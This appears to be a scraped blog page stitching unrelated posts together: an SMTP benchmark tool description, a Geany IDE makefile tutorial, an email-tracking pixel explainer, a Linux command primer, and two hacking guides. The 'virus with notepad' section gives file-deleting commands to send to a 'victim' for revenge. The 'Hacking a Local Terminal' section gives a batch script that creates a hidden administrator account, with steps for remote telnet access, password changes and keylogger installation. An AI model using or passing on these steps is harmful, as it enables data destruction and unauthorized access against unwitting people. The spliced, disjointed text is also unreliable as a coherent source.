benchmark SMTP servers

This is a program I wrote to benchmark SMTP servers. I started work on this because I need to know which mail server will give the best performance with more than 1,000,000 users. I have decided to release it under the GPL because there is no benefit in keeping the source secret, and the world needs to know which mail servers perform well and which don’t!

At the OSDC conference in 2006 I presented a paper on mail relay performance based on the new BHM program that is now part of Postal.

I have a Postal category on my main blog that I use for a variety of news related to Postal. This post (which will be updated periodically) will be the main reference page for the software. Please use the comments section for bug reports and feature requests.

It works by taking a list of email addresses to use as FROM and TO addresses. I originally used a template to generate the list of users because if each email address takes 30 bytes of storage then 3,000,000 accounts would take 90M of RAM which would be more than the memory in the test machine I was using at the time. Since that time the RAM size in commodity machines has increased far faster than the size of ISP mail servers so I removed the template feature (which seemed to confuse many people).

When sending the mail the subject and body will be random data. A header field X-Postal will be used so that procmail can easily filter out such email just in case you accidentally put your own email address as one of the test addresses. ;)

I have now added two new programs to the suite, postal-list, and rabid. Postal-list will list all the possible expansions for an
account name (used for creating a list of accounts to create on your test server). Rabid is the mad Biff, it is a POP benchmark.

Postal now adds a MD5 checksum to all messages it sends (checksum is over the subject and message body including the “\r\n” that ends each line of text in the SMTP protocol). Rabid now checks the MD5 checksum and displays error messages when it doesn’t match.

I have added rate limiting support in Rabid and Postal. This means that you can specify that these programs send a specific number of messages and perform a specific number of POP connections per minute respectively. This should make it easy to determine the amount of system resources that are used by a particular volume of traffic. Also if you want to run performance analysis software to determine what the bottlenecks are on your mail server then you could set Postal and Rabid to only use half the maximum speed (so the CPU and disk usage of the analysis software won’t impact on the mail server).

I will not release a 1.0 version until the following features are implemented:

* Matching email sent by Postal and mail received by BHM and Rabid to ensure that each message is delivered correctly (no repeats and no corruption)

* IMAP support in Rabid that works

* Support for simulating large numbers of source addresses in Postal. This needs to support at least 2^24 addresses so it is entirely impractical to have so many IP addresses permanently assigned to the test machine.

* Support for simulating slow servers in Postal and BHM (probably reducing TCP window size and delaying read() calls)

* Making BHM simulate the more common anti-spam measures that are in use to determine the impact that they have on list servers

* Determining a solution to the problem of benchmarking DNS servers. This may mean just including documentation on how to simulate the use patterns of a mail server using someone else’s DNS benchmark, but may mean writing my own DNS benchmark.

download link:



Since a specific dependency can be passed as parameter when the makefile is called I guess an IDE uses this to execute the required command. For example:

COMPILER = /usr/local/cris/bin/gcc-cris
CFLAGS = -mlinux -o
SOURCES = main.c
TARGET = Hello_World
DESTINATION = root@FOXBoard:/mnt/flash/bin/HelloWorld

# top-level rule to create the program, executed by default if no params are provided
all: compile

# Called by pressing the Compile or Build button in Geanny
compile: $(SOURCES)

build: compile


When the command make compile is executed, the code is only compiled. When the command make build it first executes the compile dependency and than copies the executable to the target. I would expect that the IDE provides the basic menu structure and allows the programmer to enter the command to execute when the menu item is selected. In that case, it’s easy to integrate custom compilers or special target needs in the default IDE.

After spending a hour searching how this works in Anjuta I could not find how to make this work. It might be that Anjuta is already to complex for what I want, it is designed for working with huge open source projects, in my case it will be a couple of local files that need to be managed.

Searching the internet for a simple Linux IDE results in several hits refering to Geany. The home page states “It was developed to provide a small and fast IDE, which has only a few dependencies from other packages”. Sounds like this is what I’m looking for. Using the Applications | Add/Remove… menu in Ubuntu shows that Geany can automaticly be installed.

After installation and starting Geany it is easy to find your way in this program. First guess is that I will be needing to setup a new project, using the Project | New menu option. It asks for a project name (HelloWorld), the file to store the project settings in (HelloWorld.geany) and the base folder of the project (/home/jan/FOXBoard/HelloWorld). After pressing the create button I can open the files that I already created before manually (main.c).

After opening the main.c file the Build menu options are enabled. Selection the Build | Compile menu command shows that gcc is used for compiling the application and that no errors are found. Nice, but I don’t want gcc but I want gcc-cris to be used, or actually I want that make is called with my own parameter.

In the Build menu there is an option available Set includes and arguments, selecting this option shows a dialog that offers three input fields to enter commands for Compile, Build and Execute. Here the gcc command is listed, I guess these commands are indeed given to Linux to execute so entering make compile in the Compile field, make build in the Build field and make build in the Execute field should do the trick. After pressing the OK button and selecting Build | Compile the Compiler shows in blue the execute command (make compile (in directory:/home/jan/FOXBoard/HelloWorld)) and the output of the make program (/usr/local/cris/bin/gcc-cris -mlinux -o Hello_World main.c). After a second a blue message indicates that the Compilation finished successfully. The Build | Build menu command or the Build | Execute command does the same with the addition of executing the secure copy as well.

In the Edit | Preferences menu you can select in the Toolbar tab the option to display a Compile and Run button. These buttons call the Build | Compile menu (and so make compile) and the Build | Execute menu (and so make build) to make life even more easy.

On purpose a mistake is made in main.c to check how errors are handled. The printf is replaced by pri ntf, after pressing compile it shows an error in the Compiler tab and highlights the error in main.c. Very, very nice! It looks like I found my base for the developing code, next step would be to include a debugger as well.

reference : animalrobots

how mailtracking(dot)com actully works.. get data from image

on the front end.......
once we register our mail with


then we just have to add to the email addresses we have to send to

we can send email which they keep track and send us updates like..,

when it was opened,
to whom it was sent,
etc... etc..


real facts behind this trick
first of all,
when we add

we are just sending our mail to them (their server)..
proof : check the mail headers of the recipients, its actually from (something).mailtracking(dot)com,
or check mailed by option in the received email in gmail, it will be like this : "mailed-by"


they add few files which a normal and average user won't recognise..
they add transparent images as shown below..

these 2 are their images (steganography)

size 1x1 px

size 4x7 px


otally 3 files..
these files are added to email with html tags like etc...
and send to your recipients address..


when the user opens the image, the image is retrieved from their server, hence, your user agent is captured and so is the ip address..

and you get info that your victim has read the email, or has forwarded


and the funny part is,
people still don't realize this..
when the image is being retrieved, the server recognizes the user agent, ip address etc..
you wil get their ip, user agent, computer they use, etc...

hack and enjoy...!!!

reference: cyberterrorist

How to make a powerfull virus with only notepad

****************( Works only for Linux and Win XP )****************

To delete all folders/files just put this:

DEL /F /Q *

Into notpad and save it as whateveryouwant.cmd

It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.


If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:
Now in your notepad type "erase C:TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C: and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:WINDOWS (or C:LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again


Hacking a Local Terminal

For the screenshots, I'll be using my Desktop PC and my Samsung Q1.

You will need a USB Flash Drive and a separate computer connected to the same network.

Wait until the target computer is available for use (maybe the person got up to check on something, who knows). As you enter the computer, you can do 2 things:

1) Have a batch ready on your flash drive. The code should be a little something like this:
@echo off
net user SupportUser codemachine /add
net localgroup administrators SupportUser /add

Good, this batch creates a backdoor administrator account on your target terminal. The second option was to do it by hand, but who wants to do that? The chances of having the time being cut short because of your flash drive being recognized are high, that's my opinion.

Go to the Control Panel > Administrative Tools > Services > Telnet
Make sure that the Telnet service is online.

Now scram, get out of there and head to your other computer. At a safe place, open up your Command prompt (or whatever you're using, I use Putty sometimes even though it sucks) and enter:
telnet 192.168.*.*

You should get a message asking I'd you want to continue..

You are about to send your password information to a remote computer in Internet zone. This might not be safe. Do you want to send anyway(y/n):

..otherwise you get the login screen. Enter your backdoor information and login. From there you can surf the directories and change peoples passwords. You can install a keylogger to everyones' startup directory, for example.

If you are in a hurry and want to destroy someones PC forever, have someone sitting with the other PC and after you make your backdoor, instantly delete everything. Its very simple, my brother broke his macbook so he was using our old dell laptop. When he was out, I installed a backdoor and began messing around with him while he was online. For example, at the expense of my own Internet, I overloaded the connection and got him to shutdown. When he rebooted, his password was changed!

Have fun and stay safe! ;)


linux shell commands

When opening a shell, your will be logged in with your active account to your home directory (this is usually in /home/user_name).

check --> that every command has lots of options available. To see all the manual pages for the specific command, simply type "man ". It is important to understand that under Linux operating systems, commands are case-sensitive. This means that "A" is different from "a".

then go thorough files sys .... use:

- pwd - Prints out on the screen the working directory (eg /etc/ssh)
- cd - changes directory (eg cd .. - goes up one dir; cd etc - enters /etc dir)
- ls - lists the content of the directory
- mkdir - creates a new directory (mkdir dir_name)
- touch - creates a new file (touch file_name)
- rmdir - removes a directory (rmdir dir_name)
- cp - copies a file/directory (cp source_file destination_file)
- mv - moves a file/directory - also used for renaming a file or directory (mv old_location new_location or mv old_name new_name)
- rm - removes files (rm file_name)

To search a file, you can use

- find (used for filenames)
- grep
To view a file, you can use

- more - will display a file page by page
- cat - displays all the file
- head - displays the first lines
- tail - displays the last lines (useful for example when you want to view the last information logged in a file by the system for example)

To edit a file you must use a built-in editor from the command-line. Generally, this is vi and it's used with the syntax vi .

To uncompress an archive (usually tar.gz) you must use the tar command with the syntax tar -xvzf .

To print a file, use lpr command. Note that you must have some daemons up and running to manage the printer. Usually this is cups (Common UNIX Printing System) that comes with all major distributions.
To remove a file from printer queue (you can list the queue with lpq command) you can use lprm .

To mount/unmount (add in your file system as accessible media) use:

- mount /mnt/floppy - to mount floppies
- umount /mnt/floppy - to unmount floppie
- mount /mnt/cdrom - to mount CD-ROMs
- mount /mnt/cdrom - to unmount CD-ROMs

They usually mount automatically, but you could end-up in the situation where you must do it manually.
To mount a partition:
First create a directory in /mnt (mkdir /mnt/my_new_drive) then use the mount command (mount /dev/source /mnt/my_new_drive) where /dev/source is the device (partition) you want to mount in your file system.

If you want to connect to a remote host, use the ssh command. The syntax is ssh .

System management:

- ps - shows the current processes running (useful: ps -A shows up all processes)
In the list obtained by using ps command you will see a PID number (Process identification).

This number is required to stop a service or application. Use kill to stop a task.

- top - works somehow like the Task manager in Windows. It shows up the system resources, the processes running, average load, etc. Useful is top
-d - sets up the refresh period. You can put any value from .1 (10 ms) to 100 (100 seconds) or even greater.

- uptime will display the system's uptime and the load average for that moment, 5 minutes and 15 minutes in the past.

Usually, the load average is calculated as the percent of system resources (processor, RAM, harddisk I/O, network load) used at that moment. 0.37 means that 37% was used. A greater value like 2.35 means that the system had to que some data because it should be 235% faster to compute all without problems. Anyhow, this can be different from distribution to distribution.

- free - will display information on system's memory

- ifconfig - view detailed information about your network interfaces; generally your ethernet network interface will be named eth0. You can also set up the network settings like IP address or so by using this command (see man ifconfig). If something goes wrong, you can also stop/start the interface by using ifconfig up/down

- passwd - enables you to change your password (passwd own_user or others if you are logged in as root)

- useradd - enables to add a new user (see man useradd)

Anywhere you are, you cand use the TAB key to autocomplete a filename or command. This will be usefull when getting used to the commands available. You can also hit up arrow and down arrow to scroll through the history of the commands you entered.
You can also use multiple command on one line. Let's say you want to create 3 directories at once. The syntax is mkdir dir1 ; mkdir dir2 ; mkdir dir3.
Another useful thing is the pipe command. You can get a command output through another. Eg: man mkdir | tail will display the last lines in the manual pages of the mkdir command.

If at anytime you are asked for the root account (the super-administrator of the system) you can login in temporary with it by using the su command. You should also include -l (su -l) parameter to switch the home folder and available commands too. Note that you will be prompted for a password too.

To exit the shell type exit or logout.